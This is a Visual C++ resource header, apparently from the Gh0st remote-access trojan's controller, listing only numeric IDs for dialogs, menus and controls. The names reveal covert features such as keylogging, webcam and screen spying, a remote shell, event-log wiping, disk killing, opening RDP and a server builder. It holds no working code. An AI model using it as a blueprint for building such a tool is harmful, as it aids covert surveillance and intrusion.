//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by Gh0st.rc
//
#define IDD_ABOUTBOX                    100
#define IDD_DIALOG_CREATE               102
#define IDM_POPUP1                      106
#define IDM_POPUP2                      107
#define IDM_POPUP3                      108
#define IDM_POPUP4                      109
#define IDM_POPUP5                      110
#define IDR_MAINFRAME                   128
#define IDR_MENU_TRAY                   130
#define IDR_MENU_TAB                    131
#define IDR_MENU_LIST                   132
#define IDR_FILEMANAGER                 133
#define IDB_MENU2                       141
#define IDB_MENU3                       142
#define IDB_MENU4                       143
#define IDD_DIALOG_TRANSFERMODE         144
#define IDB_MENU5                       144
#define IDD_DIALOG_CHANGE_GROUP         145
#define IDD_DIALOG_FILEMANAGER          146
#define IDR_TOOLBAR1                    147
#define IDI_ICOFILE                     148
#define IDB_TOOLBAR_ENABLE              149
#define IDB_TOOLBAR_DISABLE             150
#define IDC_DRAG                        151
#define IDC_MUTI_DRAG                   152
#define IDR_TOOLBAR2                    154
#define IDB_MENU_BAR                    155
#define IDR_LOCAL_VIEW                  156
#define IDR_REMOTE_VIEW                 157
#define IDD_DIALOG_SHELL                158
#define IDI_CMDSHELL                    159
#define IDR_TOOLBAR3                    164
#define IDD_DIALOG_SETTING              166
#define IDD_DIALOG_BUILD                167
#define IDB_TOOLBAR                     168
#define IDI_ICON_CAM                    169
#define IDI_ICON_NOCAM                  170
#define IDD_DIALOG_SCREENSPY            171
#define IDC_DOT                         172
#define IDI_SCREENSYP                   173
#define IDD_DIALOG_WEBCAM               174
#define IDI_WEBCAM                      175
#define IDD_DIALOG_AUDIO                176
#define IDI_AUDIO                       177
#define IDD_DIALOG_SYSTEM               179
#define IDI_SYSTEM                      180
#define IDR_MENU_SLIST                  181
#define IDC_DELKEY                      182
#define IDD_DIALOG_UPLOAD               185
#define IDD_DIALOG_PROXY                187
#define IDD_LOGIN                       189
#define IDD_DIALOG_KEYBOARD             192
#define IDI_KEYBOARD                    193
#define IDR_LOG                         193
#define IDD_CHAT                        193
#define IDR_TOOLBAR4                    194
#define IDC_SAVEKEY                     195
#define IDB_TOOLBAR_SEARCH              197
#define IDD_COLOR                       197
#define IDD_DIALOG_MESSAGEBOX           199
#define IDD_DIALOG_PLUGINS              208
#define IDD_DIALOG_SERVICE              210
#define IDR_MENU_SERVICE                213
#define IDI_ICONSERVICE                 216
#define IDD_DIALOG_SERVICE_INFO         217
#define IDI_ICON_REGEDIT                217
#define IDD_DIALOG_REGEDIT              218
#define IDR_MENU_REGEDIT_MAIN           219
#define IDI_ICON1                       224
#define IDI_ICON2                       226
#define IDB_MENU                        226
#define IDR_MENU_REGEDIT_TREE           227
#define IDI_ICON3                       227
#define IDI_ICON4                       228
#define IDI_ICON5                       229
#define IDD_DIALOG_REGEDIT_TEXT         230
#define IDI_ICON6                       230
#define IDD_BUILD                       233
#define IDR_WAVE_LOGIN                  235
#define IDR_WAVE_OFFLINE                236
#define IDR_WAVE_SETTING                237
#define IDD_DIALOG_TEXTCHAT             238
#define IDD_DIALOG_PRANK                239
#define IDR_MENU_SERVERLIST             243
#define IDR_MENU_SYSTEMMANAGER          244
#define IDD_DIALOG_PROXY_MAP            245
#define IDI_ICON7                       246
#define IDI_ICON8                       247
#define IDI_ICON9                       248
#define IDD_SELECT_QQ                   249
#define IDI_ICON_1                      250
#define IDI_ICON_2                      251
#define IDI_ICON_3                      252
#define IDI_ICON_4                      253
#define IDI_ICON_5                      254
#define IDI_ICON_6                      255
#define IDI_ICON_77                     256
#define IDI_ICON_88                     257
#define IDI_ICON_99                     258
#define IDD_DIALOG_LOGIN                261
#define IDD_DIALOG_REG                  262
#define IDB_BITMAP_LOGO                 264
#define IDI_ICON_MD5                    265
#define IDI_ICON_TOOL                   266
#define IDD_DIALOGBAR                   267
#define IDI_ICON_WEATHER                268
#define IDR_MENU_REGEDIT_LIST           269
#define IDI_dk                          269
#define IDI_zj                          270
#define IDI_js                          271
#define IDI_fs                          272
#define IDR_TOOLBAR_MAIN                273
#define IDB_BITMAP_FWSC                 277
#define IDB_BITMAP_SYGJ                 278
#define IDB_BITMAP_GXYM                 279
#define IDB_BITMAP_GYCX                 280
#define IDB_BITMAP_XTSZ                 281
#define IDR_GIF1                        283
#define IDR_SKIN                        284
#define IDD_TOOLS_DIALOG                332
#define IDC_LIST2                       333
#define IDD_UPDATE_DLG                  333
#define IDC_EDIT_PATH                   334
#define IDC_EDIT_TIME1                  335
#define IDC_SELECTICON                  336
#define IDC_BUTTON_SAVEAS               337
#define IDC_BUTTON3                     338
#define IDC_SELECTFILE                  339
#define IDC_START                       340
#define IDC_STOP                        341
#define IDC_BUTTON4                     342
#define IDC_CHECK3                      343
#define IDC_FILE_PATH                   344
#define IDC_BUTTON5                     345
#define IDC_EDIT5                       346
#define IDC_ICONSS                      347
#define IDC_EDIT2                       348
#define IDC_OMD3                        349
#define IDC_CMD5                        350
#define IDC_STATIC_COUNT                351
#define IDC_EDIT4                       352
#define IDI_ICON10                      555
#define IDI_ICON21                      556
#define IDI_ICON32                      557
#define IDI_ICON43                      558
#define IDI_ICON54                      559
#define IDI_ICON65                      560
#define IDI_ICON76                      561
#define IDI_ICON87                      562
#define IDI_ICON98                      563
#define IDI_ICON11                      564
#define IDI_ICON12                      565
#define IDI_ICON13                      566
#define IDI_ICON14                      567
#define IDI_ICON15                      568
#define IDI_ICON16                      569
#define IDI_ICON17                      570
#define IDI_ICON18                      571
#define IDI_ICON19                      572
#define IDI_ICON20                      573
#define IDI_ICON22                      574
#define IDI_ICON23                      575
#define IDI_ICON24                      576
#define IDI_ICON25                      577
#define IDI_ICON26                      578
#define IDI_ICON27                      579
#define IDI_ICON28                      580
#define IDI_ICON29                      581
#define IDI_ICON30                      582
#define IDI_ICON31                      583
#define IDI_ICON33                      584
#define IDI_ICON34                      585
#define IDI_ICON35                      586
#define IDI_ICON36                      587
#define IDI_ICON37                      588
#define IDI_ICON38                      589
#define IDI_ICON39                      590
#define IDI_ICON40                      591
#define IDI_ICON41                      592
#define IDI_ICON42                      593
#define IDI_ICON44                      594
#define IDI_ICON45                      595
#define IDI_ICON46                      596
#define IDI_ICON47                      597
#define IDI_ICON48                      598
#define IDI_ICON49                      599
#define IDI_ICON50                      600
#define IDI_ICON51                      601
#define IDI_ICON52                      602
#define IDI_ICON53                      603
#define IDI_ICON55                      604
#define IDI_ICON56                      605
#define IDI_ICON57                      606
#define IDI_ICON58                      607
#define IDI_ICON59                      608
#define IDI_ICON60                      609
#define IDI_ICON61                      610
#define IDI_ICON62                      611
#define IDI_ICON63                      612
#define IDI_ICON64                      613
#define IDI_ICON66                      614
#define IDI_ICON67                      615
#define IDI_ICON68                      616
#define IDI_ICON69                      617
#define IDI_ICON70                      618
#define IDI_ICON71                      619
#define IDI_ICON72                      620
#define IDI_ICON73                      621
#define IDI_ICON74                      622
#define IDI_ICON75                      623
#define IDI_ICON77                      624
#define IDI_ICON78                      625
#define IDI_ICON79                      626
#define IDI_ICON80                      627
#define IDI_ICON81                      628
#define IDI_ICON82                      629
#define IDI_ICON83                      630
#define IDI_ICON84                      631
#define IDI_ICON85                      632
#define IDI_ICON86                      633
#define IDI_ICON88                      634
#define IDI_ICON89                      635
#define IDI_ICON90                      636
#define IDI_ICON91                      637
#define IDI_ICON92                      638
#define IDI_ICON93                      639
#define IDI_ICON94                      640
#define IDI_ICON95                      641
#define IDI_ICON96                      642
#define IDI_ICON97                      643
#define IDI_ICON99                      644
#define IDI_ICON209                     645
#define IDI_ICON210                     646
#define IDI_ICON211                     647
#define IDI_ICON212                     648
#define IDI_ICON213                     649
#define IDI_ICON214                     650
#define IDI_ICON215                     651
#define IDI_ICON216                     652
#define IDI_ICON217                     653
#define IDI_ICON100                     664
#define IDI_ICON101                     665
#define IDI_ICON102                     666
#define IDI_ICON103                     667
#define IDI_ICON104                     668
#define IDI_ICON105                     669
#define IDI_ICON106                     670
#define IDI_ICON107                     671
#define IDI_ICON108                     672
#define IDI_ICON109                     673
#define IDI_ICON110                     674
#define IDI_ICON111                     675
#define IDI_ICON112                     676
#define IDI_ICON113                     677
#define IDI_ICON114                     678
#define IDI_ICON115                     679
#define IDI_ICON116                     680
#define IDI_ICON117                     681
#define IDI_ICON118                     682
#define IDI_ICON119                     683
#define IDI_ICON120                     684
#define IDI_ICON121                     685
#define IDI_ICON122                     686
#define IDI_ICON123                     687
#define IDI_ICON124                     688
#define IDI_ICON125                     689
#define IDI_ICON126                     690
#define IDI_ICON127                     691
#define IDI_ICON128                     692
#define IDI_ICON129                     693
#define IDI_ICON130                     694
#define IDI_ICON131                     695
#define IDI_ICON132                     696
#define IDI_ICON133                     697
#define IDI_ICON134                     698
#define IDI_ICON135                     699
#define IDI_ICON136                     700
#define IDI_ICON137                     701
#define IDI_ICON138                     702
#define IDI_ICON139                     703
#define IDI_ICON140                     704
#define IDI_ICON141                     705
#define IDI_ICON142                     706
#define IDI_ICON143                     707
#define IDI_ICON144                     708
#define IDI_ICON145                     709
#define IDI_ICON146                     710
#define IDI_ICON147                     711
#define IDI_ICON148                     712
#define IDI_ICON149                     713
#define IDI_ICON150                     714
#define IDI_ICON151                     715
#define IDI_ICON152                     716
#define IDI_ICON153                     717
#define IDI_ICON154                     718
#define IDI_ICON155                     719
#define IDI_ICON156                     720
#define IDI_ICON157                     721
#define IDI_ICON158                     722
#define IDI_ICON159                     723
#define IDI_ICON160                     724
#define IDI_ICON161                     725
#define IDI_ICON162                     726
#define IDI_ICON163                     727
#define IDI_ICON164                     728
#define IDI_ICON165                     729
#define IDI_ICON166                     730
#define IDI_ICON167                     731
#define IDI_ICON168                     732
#define IDI_ICON169                     733
#define IDI_ICON170                     734
#define IDI_ICON171                     735
#define IDI_ICON172                     736
#define IDI_ICON173                     737
#define IDI_ICON174                     738
#define IDI_ICON175                     739
#define IDI_ICON176                     740
#define IDI_ICON177                     741
#define IDI_ICON178                     742
#define IDI_ICON179                     743
#define IDI_ICON180                     744
#define IDI_ICON181                     745
#define IDI_ICON182                     746
#define IDI_ICON183                     747
#define IDI_ICON184                     748
#define IDI_ICON185                     749
#define IDI_ICON186                     750
#define IDI_ICON187                     751
#define IDI_ICON188                     752
#define IDI_ICON189                     753
#define IDI_ICON190                     754
#define IDI_ICON191                     755
#define IDI_ICON192                     756
#define IDI_ICON193                     757
#define IDI_ICON194                     758
#define IDI_ICON195                     759
#define IDI_ICON196                     760
#define IDI_ICON197                     761
#define IDI_ICON198                     762
#define IDI_ICON199                     763
#define IDI_ICON200                     764
#define IDI_ICON201                     765
#define IDI_ICON202                     766
#define IDI_ICON203                     767
#define IDI_ICON204                     768
#define IDI_ICON205                     769
#define IDI_ICON206                     770
#define IDI_ICON207                     771
#define IDI_ICON208                     772
#define IDI_NIGHT_zhongyuzhuandayu      773
#define IDI_NIGHT_zhongyu               774
#define IDI_NIGHT_xiaoyuzhuanzhongyu    775
#define IDI_DAY_xiaoyuzhuanzhongyu      776
#define IDI_DAY_zhongxue                777
#define IDI_NIGHT_zhongxue              778
#define IDI_NIGHT_baoxue                779
#define IDI_DAY_baoxue                  780
#define IDI_DAY_shachenbao              781
#define IDI_NIGHT_shachenbao            782
#define IDI_NIGHT_qiangshachenbao       783
#define IDI_DAY_qiangshachenbao         784
#define IDI_DAY_mai                     785
#define IDI_NIGHT_mai                   786
#define IDI_NIGHT_yangsha               787
#define IDI_DAY_yangsha                 788
#define IDI_DAY_fuchen                  789
#define IDI_NIGHT_fuchen                790
#define IDI_NIGHT_daxuezhuanbaoxue      791
#define IDI_DAY_daxuezhuanbaoxue        792
#define IDI_DAY_xiaoxuezhuanzhongxue    793
#define IDI_NIGHT_xiaoxuezhuanzhongxue  794
#define IDI_NIGHT_zhongxuezhuandaxue    795
#define IDI_NIGHT_zhenyu                796
#define IDI_DAY_zhenxue                 797
#define IDI_NIGHT_zhenxue               798
#define IDI_NIGHT_yujiaxue              799
#define IDI_NIGHT_yin                   800
#define IDI_NIGHT_xiaoyu                801
#define IDI_NIGHT_xiaoxue               802
#define IDI_NIGHT_wu                    803
#define IDI_NIGHT_tedabaoyu             804
#define IDI_NIGHT_qing                  805
#define IDI_NIGHT_leizhenyubanyoubingbao 806
#define IDI_NIGHT_leizhenyu             807
#define IDI_NIGHT_duoyun                808
#define IDI_NIGHT_dongyu                809
#define IDI_NIGHT_dayuzhuanbaoyu        810
#define IDI_NIGHT_dayu                  811
#define IDI_NIGHT_daxue                 812
#define IDI_NIGHT_dabaoyuzhuantedabaoyu 813
#define IDI_NIGHT_dabaoyu               814
#define IDI_NIGHT_baoyuzhuandabaoyu     815
#define IDI_NIGHT_baoyu                 816
#define IDI_DAY_zhongyuzhuandayu        817
#define IDI_DAY_zhongyu                 818
#define IDI_DAY_zhongxuezhuandaxue      819
#define IDI_DAY_zhenyu                  820
#define IDI_DAY_yujiaxue                821
#define IDI_DAY_yin                     822
#define IDI_DAY_xiaoyu                  823
#define IDI_DAY_xiaoxue                 824
#define IDI_DAY_wu                      825
#define IDI_DAY_tedabaoyu               826
#define IDI_DAY_qing                    827
#define IDI_DAY_leizhenyubanyoubingbao  828
#define IDI_DAY_leizhenyu               829
#define IDI_DAY_duoyun                  830
#define IDI_DAY_dongyu                  831
#define IDI_DAY_dayuzhuanbaoyu          832
#define IDI_DAY_dayu                    833
#define IDI_DAY_daxue                   834
#define IDI_DAY_dabaoyuzhuantedabaoyu   835
#define IDI_DAY_dabaoyu                 836
#define IDI_DAY_baoyuzhuandabaoyu       837
#define IDI_DAY_baoyu                   838
#define IDC_COMBO_GROUP                 1000
#define IDC_HOST_OR_IP                  1000
#define IDC_LOCAL_PATH                  1001
#define IDC_EDI_ONLINE                  1001
#define IDC_START_PORT                  1001
#define IDC_REMOTE_PATH                 1002
#define IDC_EDI_PORT                    1002
#define IDC_END_PORT                    1002
#define IDC_EDI_GROUP                   1003
#define IDC_SENDKEY                     1003
#define IDC_MAX_THREAD                  1003
#define IDC_LIST_REMOTE                 1004
#define IDC_EDI_VERSION                 1004
#define IDC_ZRAZ1                       1004
#define IDC_STATICKEY                   1004
#define IDC_TIME_OUT                    1004
#define IDC_LIST_LOCAL                  1005
#define IDC_ZRAZ2                       1005
#define IDC_OVERWRITE                   1006
#define IDC_LIST_REMOTE_SEARCH          1006
#define IDC_RDI_GREEN                   1006
#define IDC_SCAN                        1006
#define IDC_OVERWRITE_ALL               1007
#define IDC_RDI_RUNREG                  1007
#define IDC_IS_SPECIFIED_PORT           1007
#define IDC_ADDITION                    1008
#define IDC_ADDITION_ALL                1009
#define IDC_BTN_BUILD                   1009
#define IDC_TIPS                        1010
#define IDC_EDI_SOCKETHEAD              1010
#define IDC_STATIC_REMOTE               1011
#define IDC_CHECK_DOWN                  1011
#define IDC_TIME                        1011
#define IDC_JUMP                        1012
#define IDC_STATIC_LOG                  1012
#define IDC_GIFFIRST                    1012
#define IDC_EDIT                        1013
#define IDC_EDI_LOG                     1013
#define IDC_PROGRESS1                   1013
#define IDC_COMBO_DNS                   1013
#define IDC_JUMP_ALL                    1014
#define IDC_SEND_LOCALAUDIO             1014
#define IDC_EDI_FILEPATH                1014
#define IDC_SPECIFIED_PORTS             1014
#define IDC_CANCEL                      1015
#define IDC_EDI_FILENAME                1015
#define IDC_STATIC_DATACURVE            1017
#define IDC_COMBO_Color                 1017
#define IDC_CHECK_REC                   1018
#define IDC_BSend                       1018
#define IDC_STATIC_LISTEN_SAVE          1019
#define IDC_BCANCEL                     1019
#define IDC_TAB                         1020
#define IDC_LIST                        1021
#define IDC_EDIT_BUILDLOG               1021
#define IDC_EDIT_LISTEN_PORT            1022
#define IDC_CHECK_DISABLE_POPTIPS       1023
#define IDC_REMOTE_HOST1                1023
#define IDC_REMOTE_PORT1                1024
#define IDC_COMBO_INPUTDRIVE            1025
#define IDC_REMOTE_PORT2                1025
#define IDC_COMBO_INPUTLINES            1026
#define IDC_REMOTE_HOST2                1026
#define IDC_EDIT_DAT                    1026
#define IDC_EDIT_NEWDAT                 1027
#define IDC_BUTTON_GETDAT               1028
#define IDC_EDIT_SERVICE_NAME           1029
#define IDC_BUTTON_CHANGDAT             1029
#define IDC_username                    1029
#define IDC_EDIT_SERVICE_DISPLAYNAME    1030
#define IDC_BUTTON_GET_QQ               1030
#define IDC_userpass                    1030
#define IDC_EDIT_SERVICE_DESCRIPTION    1031
#define IDC_BUTTON_DISCONNECT_NETWORK   1031
#define IDC_LOGIN                       1031
#define IDC_CHECK_NOINSTALL             1032
#define IDC_BUTTON_KILL_DISK            1032
#define IDC_EDIT_REMARK                 1033
#define IDC_COMBO_GROUP_NAME            1034
#define IDC_CHECK_NODELETE              1035
#define IDC_CHECK_INSTALL_SHARE         1036
#define IDC_EDIT_LOG                    1038
#define IDC_BUILD                       1038
#define IDC_EDIT_PORT                   1039
#define IDC_ZC_BUILD                    1039
#define IDC_EDIT_LOCAL_PATH             1040
#define IDC_ZS_BUILD                    1040
#define IDC_BUTTON_PATH                 1041
#define IDC_EDIT_CMD_LINE               1042
#define IDC_GIFLAST                     1045
#define IDC_CHECKJZ                     1046
#define IDC_CHECKXS                     1047
#define IDC_GIF_LOGIN                   1049
#define IDC_STATIC_TS                   1050
#define IDC_COMBO_TYPE                  1051
#define IDC_TEST_MASTER1                1051
#define IDC_EDIT_NET_USER               1052
#define IDC_TEST_MASTER2                1052
#define IDC_SHOWTIPS                    1052
#define IDC_HOSTNAME                    1052
#define IDC_EDIT_NET_PASS               1053
#define IDC_CHECKMF                     1053
#define IDC_EDIT_NET_GROUP              1054
#define IDC_BUTTON_NET_CREAT            1055
#define IDC_BUTTON_GUEST                1056
#define IDC_EDIT_3389_PORT              1057
#define IDC_BUTTON_3389_CHANGE          1058
#define IDC_SLIDER1                     1058
#define IDC_BUTTON_STOP_FIRE            1059
#define IDC_BUTTON_3389_OPEN            1060
#define IDC_BUTTON_3389_CLOSE           1061
#define IDC_EDIT_KB                     1061
#define IDC_EDIT_REMOTE_ADDR            1062
#define IDC_EDIT_REMOTE_PORT            1063
#define IDC_RANDOM                      1063
#define IDC_BTN_DNSUPDATE               1063
#define IDC_CHECK_FORCE                 1064
#define IDC_HUOQU_CP                    1064
#define IDC_BUTTON_CONNECT              1065
#define IDC_HUOQU_ZP                    1065
#define IDC_STATIC1                     1066
#define IDC_STATIC2                     1067
#define IDC_STATIC3                     1068
#define IDC_SERVICE_NAME                1068
#define IDC_STATIC4                     1069
#define IDC_SERVICE_DISPLAY             1069
#define IDC_STATIC5                     1070
#define IDC_SERVICE_DESCRIP             1070
#define IDC_STATIC6                     1071
#define IDC_STATIC7                     1072
#define IDC_STATIC8                     1073
#define IDC_STATIC9                     1074
#define IDC_STATIC10                    1075
#define IDC_UPX                         1076
#define IDC_BUTTON_PREVIEW              1077
#define IDC_GDTJ                        1077
#define IDC_EDIT_DNSUSER                1077
#define IDC_MEUX                        1078
#define IDC_EDIT_DNSPASS                1078
#define IDC_EDIT_admin                  1078
#define IDC_EDIT_CAPTION                1079
#define IDC_GROUP                       1079
#define IDC_EDIT_DNSDOMAIN              1079
#define IDC_COMBO_MSG_TYPE              1080
#define IDC_SIGNNOIP                    1080
#define IDC_BTN_HIDE                    1080
#define IDC_COMBO_BUTTON_TYPE           1081
#define IDC_SIGNNOIP2                   1081
#define IDC_EDIT_TEXT                   1082
#define IDC_VERSION                     1082
#define IDC_SIGNNOIP3                   1082
#define IDC_BUTTON_CONTINUE             1083
#define IDC_BUTTON_AGAIN                1084
#define IDC_PROGRESS                    1085
#define IDC_GETWAN                      1085
#define IDC_STATIC_LOCAL                1086
#define IDC_DNSIPJIAMI                  1086
#define IDC_STATIC_PROGREBT             1087
#define IDC_DNSIPSJFZ                   1087
#define IDC_STATIC_TIPS                 1088
#define IDC_EDIT1                       1088
#define IDC_EDIT_REMOTE_IP              1089
#define IDC_BUTTON2                     1089
#define IDC_EDIT_DNSIPJIAMI             1089
#define IDC_CHECK_CONSOLE               1091
#define IDC_EDIT_USER                   1094
#define IDC_3322                        1094
#define IDC_EDIT_PASS                   1095
#define IDC_FILEATTRIBUTE               1095
#define IDC_HUASHENG                    1095
#define IDC_CHECK_VERIFY                1096
#define IDC_FILEALEIXING                1096
#define IDC_NOIP                        1096
#define IDC_BUTTON_CLOSEPROXY           1097
#define IDC_STATIC_ICON                 1098
#define IDC_COMBO_INSTALLPATH           1099
#define IDC_BUTTON1                     1100
#define IDC_CHECK_WARNING_TONE          1101
#define IDC_EDIT_NEWTEXT                1103
#define IDC_ZRAZ                        1103
#define IDC_EDIT_CHAT                   1104
#define IDC_DELRTD                      1104
#define IDC_EDIT_SERDISPLAYNAME         1105
#define IDC_COMBO_PRANK_TYPE            1105
#define IDC_BAOCUN                      1105
#define IDC_EDIT_SERDESCRIPTION         1106
#define IDC_BUTTON_SEND                 1106
#define IDC_ZKFSMS                      1106
#define IDC_EDIT_FILEPATH               1107
#define IDC_ZKFKZJ                      1107
#define IDC_CHECK_LIST_DRAW             1108
#define IDC_CHANGURL                    1108
#define IDC_EDIT_SERNAME                1109
#define IDC_STATIC_TEXT                 1110
#define IDC_EXIT                        1110
#define IDC_NET_ADD                     1110
#define IDC_BUTTON_START                1111
#define IDC_BUTTON_STOP                 1112
#define IDC_BUTTON_PAUSE                1113
#define IDC_BUTTON_MSTSC                1113
#define IDC_BUTTON_USE                  1114
#define IDC_COMBO_RUNWAY                1115
#define IDC_BUTTON_CHANAGEPORT          1115
#define IDC_TREE                        1116
#define IDC_BUTTON_OPEN3389             1116
#define IDC_EDIT_HEARTBEAT_TIME         1118
#define IDC_EDIT_CONNECT_PASS           1119
#define IDC_EDIT_NAME                   1120
#define IDC_EDIT_DATE                   1121
#define IDC_BUTTON_TEST_CONNECT         1121
#define IDC_DLL_NAME                    1121
#define IDC_EXE_MEUX                    1122
#define IDC_AZZDS                       1123
#define IDC_ICO                         1124
#define IDC_COMBO_QQ                    1125
#define IDC_ICONS                       1125
#define IDC_User                        1125
#define IDC_BUTTON_RAND                 1126
#define IDC_Exemeux                     1126
#define IDC_Men                         1126
#define IDC_EDI_USER                    1127
#define IDC_STATIC_ICON5                1127
#define IDC_EDI_PASS                    1128
#define IDC_BTN_LOGIN                   1129
#define IDC_EDI_URL                     1130
#define IDC_COMBO_RELEASEPATH           1130
#define IDC_PRG_BUILD                   1132
#define IDC_RDI_TEST                    1137
#define IDC_RDI_GENERAL                 1138
#define IDC_RDI_VIP                     1139
#define IDC_EXPLORER1                   1148
#define IDC_BTN_REG                     1150
#define IDC_BTN_ACTIVATED               1151
#define IDC_TIANQI                      1153
#define IDC_FENGSU                      1154
#define IDC_CITY                        1155
#define IDC_WENDU                       1156
#define IDC_DAY                         1157
#define IDC_NIGHT                       1158
#define IDC_GUNDON                      1159
#define IDC_EDIT_DNSIP                  1160
#define IDC_GUNDONGWEB                  1160
#define IDC_NOW_PORT                    1161
#define IDC_NATIONAL                    1163
#define IDC_KBTEST                      1176
#define IDC_KBCHECK                     1177
#define IDB_MENU6                       1264
#define ID_MENUITEM_SHOW                32771
#define ID_MENUITEM_HIDE                32772
#define ID_MENUITEM_GROUP_ADD           32773
#define ID_MENUITEM_GROUP_DEL           32774
#define IDM_TRANSFER                    32775
#define ID_MENUITEM_SELECT_ALL          32776
#define IDM_RENAME                      32777
#define ID_STAUTSSPEED                  32778
#define IDM_DELETE                      32779
#define ID_STAUTS_OS                    32780
#define IDM_NEWFOLDER                   32781
#define IDT_LOCAL_PREV                  32782
#define IDT_LOCAL_COPY                  32783
#define ID_MENUITEM_CHANGE_GROUP        32784
#define IDT_LOCAL_DELETE                32785
#define ID_MENUITEM_LOGOFF              32786
#define ID_MENUITEM_FILEMANAGER         32787
#define IDT_LOCAL_NEWFOLDER             32788
#define ID_MENUITEM_REBOOT              32789
#define ID_MENUITEM_SHUTDOWN            32790
#define ID_MENUITEM_REMOTESHELL         32791
#define IDT_REMOTE_PREV                 32792
#define IDT_REMOTE_COPY                 32793
#define IDT_REMOTE_DELETE               32794
#define ID_MENUITEM_SCREENSPY           32795
#define ID_MENUITEM_SETTING             32796
#define ID_MENUITEM_WEBCAM              32797
#define IDT_REMOTE_NEWFOLDER            32798
#define ID_MENUITEM_SYSTEM              32799
#define IDT_REMOTE_STOP                 32800
#define ID_MENUITEM_REMARK              32801
#define IDM_LOCAL_BIGICON               32802
#define IDM_LOCAL_SMALLICON             32803
#define IDM_LOCAL_LIST                  32804
#define IDM_LOCAL_REPORT                32805
#define IDM_REMOTE_BIGICON              32806
#define IDM_REMOTE_SMALLICON            32807
#define IDM_REMOTE_LIST                 32808
#define IDM_REMOTE_REPORT               32809
#define IDM_REFRESH                     32810
#define IDM_LOCAL_OPEN                  32811
#define IDM_REMOTE_OPEN_SHOW            32812
#define IDM_REMOTE_OPEN_HIDE            32813
#define ID_MENUITEM_AUDIO_LISTEN        32814
#define ID_MENUITEM_UNSELECT_ALL        32815
#define ID_MENUITEM_UNINSTALL           32816
#define ID_MENUITEM_BUILD               32817
#define IDT_LOCAL_STOP                  32818
#define ID_MENUITEM_DOWNEXEC            32819
#define ID_MENUITEM_OPEN_URL_SHOW       32820
#define ID_MENUITEM_OPEN_URL_HIDE       32821
#define ID_MENUITEM_KILLPROCESS         32822
#define ID_MENUITEM_REFRESH_SLIST       32823
#define ID_MENUITEM_COPY                32830
#define ID_MENUITEM_CHANGE              32831
#define ID_MENUITEM_SELECT_NUM          32832
#define ID_MENUITEM_LOCAL_UPLOAD        32833
#define ID_MENUITEM_FIND_PROCESS        32834
#define ID_MENUITEM_FIND_WINDOW         32835
#define ID_MENUITEM_CLEAN_FIND          32836
#define ID_MENUITEM_COPY_IP             32837
#define ID_MENUITEM_COPY_ALL            32838
#define ID_MENUITEM_UPDATE_SERVER       32842
#define ID_MENUITEM_PROXY               32844
#define ID_MENUITEM_CHANGE_DLLINFO      32846
#define ID_MENUITEM_ACTIVE_USER         32847
#define ID_MENUITEM_DISABLE_USER        32848
#define IDM_EVENT_COPY                  32848
#define ID_MENUITEM_CHANGE_PASS         32849
#define ID_MENUITEM_DEL_USER            32850
#define ID_MENUITEM_DISCONNECT_USER     32851
#define ID_MENUITEM_LOGOFF_USER         32852
#define ID_MENUITEM_ADD_USER            32853
#define ID_MENUITEM_KEYBOARD            32854
#define ID_SEARCH_TEXT                  32855
#define ID_SEARCH_START                 32856
#define ID_SEARCH_STOP                  32857
#define ID_SEARCH_RESULT                32858
#define ID_MENUITEM_OPEN_FILEPATH       32859
#define ID_MENUITEM_MESSAGEBOX          32860
#define ID_MENUITEM_SAVE_IPLIST         32862
#define ID_MENUITEM_PLUGINS_MANAGER     32863
#define ID_MENUITEM_DOWN_PLUGINS        32864
#define ID_MENUITEM_MOVE                32865
#define ID_MENUITEM_PASTE               32867
#define ID_SEARCH_SUBFOLDER             32868
#define ID_MENUITEM32871                32871
#define ID_MENUITEM_SERVICEMANAGER      32872
#define ID_MENUITEM_REGEDIT             32873
#define ID_MENUITEM_START_SERVICE       32876
#define ID_MENUITEM_STOP_SERVICE        32877
#define ID_MENUITEM_PAUSE_SERVICE       32878
#define ID_MENUITEM_REGAIN_SERVICE      32879
#define ID_MENUITEM_TEXT_CHAT           32879
#define ID_MENUITEM_REBOOT_SERVICE      32880
#define ID_MENUITEM_PRANK               32880
#define ID_MENUITEM_UPDATE_IP           32881
#define ID_MENUITEM_PROPERTIES_SERVICE  32882
#define ID_MENUITEM_WINDOW_RESTORED     32882
#define ID_MENUITEM_DEL_SERVICE         32883
#define ID_MENUITEM_WINDOW_HIDE         32883
#define ID_MENUITEM_REFRESH_SERVICE     32884
#define ID_MENUITEM_WINDOW_CLOSE        32884
#define ID_MENUITEM_REGEXIT             32885
#define ID_MENUITEM_WINDOW_MAX          32885
#define ID_MENUITEM_TREE_NEW            32886
#define ID_MENUITEM_WINDOW_MIN          32886
#define ID_MENUITEM_TREE_REFRESH        32887
#define ID_MENUITEM_KILLANDDEL          32887
#define ID_MENUITEM_TREE_DEL            32888
#define ID_MENUITEM_TREE_COPYNAME       32889
#define ID_MENUITEM_TREE_ADDTOFAVORITE  32890
#define ID_MENUITEM_CLEANEVENT_ALL      32894
#define ID_MENUITEM_CLEANEVENT_SYS      32895
#define ID_MENUITEM_CLEANEVENT_APP      32897
#define ID_MENUITEM_REG_EDIT            32898
#define ID_MENUITEM_CLEANEVENT_SECURITY 32898
#define ID_MENUITEM_REG_DEL             32899
#define ID_MENUITEM_S_LOGOFF            32899
#define ID_MENUITEM_REG_STR             32900
#define ID_MENUITEM_S_REBOOT            32900
#define ID_MENUITEM_REG_DWORD           32901
#define ID_MENUITEM_S_SHUTDOWN          32901
#define ID_MENUITEM_EXSTR               32902
#define ID_MENUITEM_PROXY_MAP           32902
#define IDM_BOX_QQ                      32903
#define IDM_TOOLS                       32905
#define IDM_CHAT                        32906
#define IDM_SETCOLOR                    32907
#define IDM_EVENT_SAVE                  32959
#define IDM_EVENT_DELETE                32960
#define IDM_ALL_DELETE                  32961
#define ID_STAUTS_PORT                  59394
#define ID_STAUTJSPEED                  59395

// Next default values for new objects
// 
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_3D_CONTROLS                     1
#define _APS_NEXT_RESOURCE_VALUE        285
#define _APS_NEXT_COMMAND_VALUE         32913
#define _APS_NEXT_CONTROL_VALUE         1164
#define _APS_NEXT_SYMED_VALUE           111
#endif
#endif
